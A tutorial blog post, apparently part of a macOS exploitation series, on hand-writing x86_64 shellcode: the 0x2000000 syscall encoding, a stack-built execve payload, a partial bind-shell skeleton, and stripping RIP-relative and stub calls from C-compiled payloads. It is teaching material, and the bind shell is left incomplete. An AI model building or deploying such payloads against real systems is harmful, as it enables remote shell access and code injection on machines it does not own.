Writing macOS Shellcode From Scratch: Syscalls, Bind Shells, and the 0x2000000 Trick
Shellcode is the payload that runs after the bug. The vulnerability gets you control of execution; the shellcode is what you do with it. On macOS that usually means popping a shell, reverse or bind, but it can be anything: spawn a process, write a file, load a dylib. The constraint that shapes everything is position. Shellcode runs wherever it lands, so it cannot assume a fixed address for itself or anything it touches. No hardcoded pointers, no linker, no loader doing your relocations. Just registers, the stack, and the kernel.
This post builds macOS shellcode from nothing: first the syscall mechanism and the one encoding
quirk that separates macOS from Linux, then a command-execution payload via execve, then a bind
shell, and finally the trickier business of writing shellcode in C and stripping out everything the
compiler adds that would break it. Everything here uses the previous post’s toolkit (DTrace to
confirm the right syscalls fire, LLDB to step the payload) so this is where the reading turns into
writing.
Syscalls and the One Quirk That Matters
A system call is how user code asks the kernel to do something privileged: open a file, create a
socket, replace the running image. To make one on x86_64 you load a syscall number into RAX, put
the arguments in RDI, RSI, RDX, R10, R8, and R9, in that order, and execute the syscall
instruction. These are the System V AMD64 argument registers with one substitution: R10 stands in
for RCX, because the syscall instruction itself overwrites RCX with the return address.
That much is identical to Linux. Here is what is not. macOS supports several classes of syscall (BSD, Mach, Mach IPC, machine-dependent) and the class is encoded into the number itself. The
class lives in the high bits, shifted left by SYSCALL_CLASS_SHIFT (24). Traditional BSD syscalls, the ones you want for shells and files, carry class 2, which becomes 0x2000000. So the real
number you load into RAX is 0x2000000 + bsd_number.
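The encoding is plain arithmetic, and a few lines of C make it concrete. This is a minimal sketch: the helper name xnu_bsd_syscall and the DEMO_ macros are made up for illustration and simply mirror the shift and class values described above.

```c
#include <assert.h>
#include <stdint.h>

/* Values taken from the text above; the DEMO_ names are hypothetical. */
#define DEMO_CLASS_SHIFT 24u  /* the SYSCALL_CLASS_SHIFT described above */
#define DEMO_CLASS_BSD   2u   /* class number for traditional BSD syscalls */

/* Returns the value to load into RAX for a given BSD syscall number. */
static uint32_t xnu_bsd_syscall(uint32_t bsd_number)
{
    /* The BSD number has to fit below the class bits. */
    assert(bsd_number < (1u << DEMO_CLASS_SHIFT));
    return (DEMO_CLASS_BSD << DEMO_CLASS_SHIFT) | bsd_number;
}
```

Called with 4 (write), the helper returns 0x2000004. OR and addition give the same answer here because the BSD number never reaches bit 24.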
The BSD numbers come from XNU’s bsd/kern/syscalls.master. A few that matter:
# filename: syscalls.master (excerpt)
1    exit
4    write
30   accept
59   execve
90   dup2
97   socket
98   connect
104  bind
106  listen
So execve is BSD 59 (0x3b), and the value you actually load is 0x200003b. Forget the
0x2000000 and your syscall silently does the wrong thing or faults. It is the single most common
mistake when porting Linux shellcode habits to macOS. A minimal payload that writes “hi” and exits:
; filename: hello.asm
mov rax, 0x2000004 ; write (BSD 4 | class 2)
mov rdi, 1 ; fd = stdout
mov rbx, 'hi'
push rbx
mov rsi, rsp ; buf = pointer to "hi" on the stack
mov rdx, 2 ; len = 2
syscall
mov rax, 0x2000001 ; exit (BSD 1 | class 2)
mov rdi, 0
syscall
Notice there is no .data section, no string constant living at a known address. The string “hi”
is pushed onto the stack at runtime and RSI points at it wherever the stack happens to be. That
is the discipline of shellcode in miniature: build your data on the stack, point at it with the
stack pointer, never name an absolute address.
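To see what mov rbx, 'hi' followed by push rbx actually leaves in memory, the packing can be reproduced on the host. The sketch below assumes NASM-style character constants, where the first character lands in the lowest byte; pack_le is a hypothetical helper name, not part of any toolchain.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Packs up to 8 characters into a 64-bit value, first character in the
 * lowest byte, leaving the unused high bytes as zero. */
static uint64_t pack_le(const char *s)
{
    size_t len = strlen(s);
    uint64_t value = 0;

    assert(len <= 8);   /* one general-purpose register holds 8 bytes */
    for (size_t i = 0; i < len; i++) {
        value |= (uint64_t)(unsigned char)s[i] << (8 * i);
    }
    return value;
}
```

pack_le("hi") gives 0x6968. Pushed as a little-endian 8-byte value, the bytes at RSP read 68 69 00 00 00 00 00 00, so the zero padding doubles as the string terminator. A full 8-character string such as "/bin/zsh" leaves no padding, which is why the execve payload pushes an explicit zero before it.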
Verify with DTrace, not faith.
The one-liner

syscall:::entry /execname == "yourbinary"/ { printf("%s\n", probefunc); }

prints every syscall the payload makes, in order. If write and exit show up, the encoding is right. If nothing shows up, you got the 0x2000000 wrong.
Executing a Command With execve
Running an arbitrary command is one syscall: execve(path, argv, envp), which replaces the current
process image with a new one. The clean way to run a shell command is to invoke a shell with -c:
// filename: target-call.c
char *argp[] = { "/bin/zsh", "-c", "touch /tmp/mynewfile.txt", NULL };
execve("/bin/zsh", argp, NULL);
We use /bin/zsh because Apple made zsh the default shell in Catalina; it is reliably present.
execve wants three things in registers: RDI pointing at the path string, RSI pointing at the
argv array, and RDX for envp (which we can leave NULL). The whole job is constructing those
two structures on the stack with no fixed addresses.
The key insight is that the stack grows downward and arrays must be assembled backwards: you
push the last element first. The argv array is NULL-terminated, so NULL goes down first, then a
pointer to the command string, then -c, then /bin/zsh. And each of those pointers has to point
at a string you also placed on the stack. The pattern for one string:
; filename: execve-string.asm
xor rdx, rdx ; RDX = 0, our reusable NULL
push rdx ; NULL-terminate the string on the stack
mov rbx, '/bin/zsh' ; 8 bytes, fits one register
push rbx ; "/bin/zsh\0" now sits on the stack
mov rdi, rsp ; RDI -> the string (execve's first arg)
You repeat that idea for -c and the command, saving each string’s stack address into a temporary
register. Then you build the argv array itself by pushing those saved pointers (NULL first, then
the command pointer, then -c, then /bin/zsh) and point RSI at the top. Load RAX with
0x200003b, fire syscall, and the process becomes your command.
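The push order is easier to trust once you have watched it work. What follows is a host-side simulation, not shellcode: a toy downward-growing stack of 64-bit words on which the strings and then the argv pointers are pushed in the order described above. Every toy_ name is hypothetical, and the sketch assumes 64-bit pointers.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

_Static_assert(sizeof(char *) == sizeof(uint64_t), "sketch assumes 64-bit pointers");

#define TOY_WORDS 32

typedef struct {
    uint64_t mem[TOY_WORDS];
    size_t sp;                 /* index of the current top word */
} toy_stack;

static void toy_init(toy_stack *s)
{
    memset(s->mem, 0, sizeof s->mem);
    s->sp = TOY_WORDS;         /* empty: "RSP" starts past the highest word */
}

/* Like push: move the top down one word, store, return the new top address. */
static void *toy_push(toy_stack *s, uint64_t value)
{
    assert(s->sp > 0);
    s->mem[--s->sp] = value;
    return &s->mem[s->sp];
}

/* Pushes a NUL-terminated string in 8-byte chunks, last chunk first, so the
 * bytes end up in reading order. Returns the address of the first character. */
static char *toy_push_string(toy_stack *s, const char *str)
{
    size_t len = strlen(str) + 1;          /* include the terminator */
    size_t words = (len + 7) / 8;
    char *top = NULL;

    for (size_t i = words; i-- > 0;) {
        uint64_t chunk = 0;
        size_t off = i * 8;
        size_t n = (len - off < 8) ? len - off : 8;
        memcpy(&chunk, str + off, n);
        top = toy_push(s, chunk);
    }
    return top;
}

/* Strings first, then the array backwards: NULL, command, -c, /bin/zsh. */
static void *toy_build_argv(toy_stack *s)
{
    char *cmd  = toy_push_string(s, "touch /tmp/mynewfile.txt");
    char *flag = toy_push_string(s, "-c");
    char *path = toy_push_string(s, "/bin/zsh");

    toy_push(s, 0);
    toy_push(s, (uint64_t)(uintptr_t)cmd);
    toy_push(s, (uint64_t)(uintptr_t)flag);
    return toy_push(s, (uint64_t)(uintptr_t)path);   /* what RSI would hold */
}

/* Reads argv[i] out of the toy stack without aliasing tricks. */
static char *toy_argv_at(const void *argv, size_t i)
{
    char *p;
    memcpy(&p, (const unsigned char *)argv + i * sizeof p, sizeof p);
    return p;
}
```

Reading the result back with toy_argv_at gives "/bin/zsh", "-c", the command, and then NULL, which is the layout execve expects. The simulation says nothing about register choice or byte counts; it only checks that pushing backwards produces a forwards array.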
A small but real optimization, because shellcode size sometimes matters: mov rdi, rsp assembles
to three bytes (48 89 e7), while push rsp / pop rdi does the same job in two (54 5f). When
a buffer is tight, those single bytes decide whether the payload fits. When it is not, clarity
wins.
A Bind Shell in Assembly
A command-exec payload is fine when you already have a channel. When you do not, you want a shell
listening on a socket. A bind shell is a sequence of socket syscalls glued to an execve, and
writing it by hand is the best way to internalize how Berkeley sockets actually work at the syscall
level:
1. socket(AF_INET, SOCK_STREAM, 0), BSD 97: create a TCP socket. The returned file descriptor is the thread you have to keep hold of across every following call; stash it somewhere stable like R8, because RAX gets clobbered by the next syscall.
2. bind(fd, &sockaddr, len), BSD 104: bind it to an address and port. The sockaddr_in struct (family, port, address) is, again, built on the stack and pointed at. The port is stored in network byte order, so a little-endian mov needs the bytes swapped.
3. listen(fd, backlog), BSD 106: start accepting connections.
4. accept(fd, 0, 0), BSD 30: block until a client connects; this returns a new fd for the connection.
5. dup2(clientfd, n) for n in 0, 1, 2, BSD 90: wire the client socket onto stdin, stdout, and stderr. This is the step that makes the eventual shell actually talk over the network.
6. execve("/bin/zsh",...), and now zsh reads from and writes to the socket.
; filename: bindshell-skeleton.asm
; socket(AF_INET=2, SOCK_STREAM=1, 0)
mov rax, 0x2000061 ; socket (BSD 97)
mov rdi, 2
mov rsi, 1
xor rdx, rdx
syscall
mov r8, rax ; save the listening fd before RAX is reused
; ... bind, listen, accept ...
; dup2 loop wiring the client fd to fds 0,1,2
; execve /bin/zsh
The discipline that makes or breaks this is file-descriptor bookkeeping. Every syscall returns into
RAX, so the socket fd you got from socket is gone the instant you call bind. Save it first.
The same applies to the client fd from accept. Most broken bind shells are not broken
cryptography or alignment: they are a clobbered file descriptor. Step it in LLDB and watch R8.
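The byte-order detail in the bind step is the other place people slip, so here is a host-side sketch of the 16 bytes bind expects. It assumes the BSD-style sockaddr_in layout that macOS uses (a one-byte length, a one-byte family, a two-byte big-endian port, a four-byte address, eight bytes of padding) and binds to all interfaces. The demo_ names are hypothetical, and port 4444 in the note after the code is only an example.

```c
#include <assert.h>
#include <stdint.h>
#include <string.h>

#define DEMO_SOCKADDR_IN_LEN 16u
#define DEMO_AF_INET         2u

/* Fills out[16] with: sin_len, sin_family, sin_port (big-endian),
 * sin_addr (left as 0.0.0.0), sin_zero (left as zeros). */
static void demo_sockaddr_in(uint8_t out[16], uint16_t port)
{
    memset(out, 0, DEMO_SOCKADDR_IN_LEN);
    out[0] = DEMO_SOCKADDR_IN_LEN;
    out[1] = DEMO_AF_INET;
    out[2] = (uint8_t)(port >> 8);      /* high byte first: network order */
    out[3] = (uint8_t)(port & 0xff);
}

/* The first 8 bytes as a little-endian register would hold them, i.e. the
 * immediate to load before pushing the lower half of the struct. */
static uint64_t demo_first_qword(const uint8_t bytes[16])
{
    uint64_t value = 0;

    for (int i = 7; i >= 0; i--) {
        value = (value << 8) | bytes[i];
    }
    return value;
}
```

For port 4444 (0x115c) the first quadword comes out as 0x5c110210: the port bytes appear swapped inside the immediate precisely because the register is little-endian and the wire format is not. On the stack you would push a zero for the padding half first, then this value, and point RSI at RSP.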
Shellcode in C, and Fighting the Compiler
Hand-assembly is precise but slow and error-prone. Writing the logic in C and compiling it is faster, but a compiler emits code that assumes it is a normal program, and several of those assumptions are fatal to shellcode. The work is in stripping them out.
Two big ones on macOS x86_64:
RIP-relative addressing. When C references a global string or variable, the compiler emits a
load relative to the instruction pointer: lea rax, [rip + offset]. That works in a normal
binary, where the loader maps the whole image at once and the distance between an instruction and
its data never changes. It breaks in shellcode because you extract only __text: the offset still
points to where the string or global used to sit, and at the injected location that memory holds
something else entirely. The fix is to eliminate RIP-relative data references: keep data on the
stack instead of in global sections, exactly like the assembly version does. No globals, no
__DATA strings, nothing the compiler would address relative to RIP.
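One common way to keep a string out of the data sections is to write it as integer immediates into local storage, the C analogue of the mov/push pair in the assembly. The sketch below assumes a little-endian target, and the function names are hypothetical. Whether a particular compiler and optimization level really emits immediates here, rather than copying from a constant pool, is exactly what the disassembly audit has to confirm.

```c
#include <assert.h>
#include <stdint.h>
#include <string.h>

/* Writes "/bin/zsh\0" into two caller-owned 64-bit words without using a
 * string literal, and returns a pointer to the first character. */
static const char *zsh_path_in_words(uint64_t words[2])
{
    words[0] = 0x68737a2f6e69622fULL;  /* bytes 2f 62 69 6e 2f 7a 73 68 */
    words[1] = 0;                      /* terminator */
    return (const char *)words;
}

/* Host-side check only. It uses a literal and libc, so it would never be
 * part of the payload itself. */
static void check_zsh_path(void)
{
    uint64_t words[2];

    assert(strcmp(zsh_path_in_words(words), "/bin/zsh") == 0);
}
```

The contrast case is const char *path = "/bin/zsh";, which places the bytes in a separate section and reaches them with the RIP-relative lea described above.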
Calls into the __stubs section. Call a libc function like execv from C and the compiler
routes the call through a stub in __TEXT,__stubs, which jumps through a pointer the dynamic linker
fills in at load time. In shellcode there is no linker pass and the stub is not part of the
extracted code, so the call lands on a dangling jump. The workaround is to bypass the stub and call
the function directly: locate the real execv pointer (the same way the assembly payload would
resolve an address) and call through it, so the path never touches the __stubs indirection.
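In C, calling through a resolved pointer looks roughly like the sketch below. It deliberately leaves out the hard part, which is how the payload finds the real execv address at runtime; the pointer is simply passed in. The names spawn_zsh_via, execv_fn, and the demo_ recorder are hypothetical, and the recorder exists only so the call path can be exercised on the host without replacing the process.

```c
#include <assert.h>
#include <stdint.h>
#include <string.h>

/* Same shape as execv; the actual address must be resolved by the payload. */
typedef int (*execv_fn)(const char *path, char *const argv[]);

/* Builds path and argv in locals and calls through the supplied pointer,
 * so no imported symbol is referenced by name. */
static int spawn_zsh_via(execv_fn resolved_execv)
{
    uint64_t path_words[2];
    char *argv[2];

    path_words[0] = 0x68737a2f6e69622fULL;  /* "/bin/zsh", little-endian */
    path_words[1] = 0;
    argv[0] = (char *)path_words;
    argv[1] = 0;
    return resolved_execv(argv[0], argv);
}

/* Host-side stand-in for execv: records what it was handed and returns. */
static char demo_seen_path[16];
static int demo_seen_argc;

static int demo_recording_execv(const char *path, char *const argv[])
{
    assert(path != NULL);
    strncpy(demo_seen_path, path, sizeof demo_seen_path - 1);
    demo_seen_argc = 0;
    while (argv[demo_seen_argc] != 0) {
        demo_seen_argc++;
    }
    return 0;
}
```

Passing demo_recording_execv shows the function receives "/bin/zsh" and a one-element argv. In the compiled payload the thing to look for is an indirect call through a register, with no call into __stubs.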
// filename: c-shellcode-notes.c
// Compile with optimizations and no stack protector, then extract __text.
// Then audit the disassembly for two things that must NOT appear:
// - any lea reg, [rip + ...] (RIP-relative data reference)
// - any call <stub> (lazy-bound import)
// If either survives, the payload breaks the moment it runs relocated.
The honest summary: writing shellcode in C does not save you from understanding the assembly; it
just changes your job from writing it to auditing it. You compile, disassemble, find the
constructs the compiler added that assume a loader, and surgically remove them until the __text
section is genuinely position-independent. That review loop is its own skill, and it is where most
of the time goes.
Why This Matters
Everything in this post is plumbing for the rest of the series. The injection posts (DYLD,
dylib hijacking, Mach task ports) all need a payload to inject, and that payload is shellcode
built on exactly these rules: position-independent, stack-constructed, 0x2000000-encoded. The
BlockBlock case study later injects execv shellcode into a security product’s process; the
shellcode it injects is the kind we just built. When a privilege-escalation chain ends in “and then
we run our payload as root,” this is the payload.
The deeper point is the mindset. Shellcode forces you to think about code with no fixed address, data you carry with you, and a kernel interface you talk to in raw register conventions. That same discipline (assume nothing about layout, build what you need at runtime, verify with DTrace) is the discipline of every exploit that follows. Next we use it: getting a payload into a process we do not own, starting with the oldest trick in the macOS book, dylib injection.
References
- Apple / XNU. bsd/kern/syscalls.master, osfmk/mach/i386/syscall_sw.h, XNU 7195.50.7.100.1. opensource.apple.com.
- AMD64 ABI. System V Application Binary Interface, x86-64 calling convention.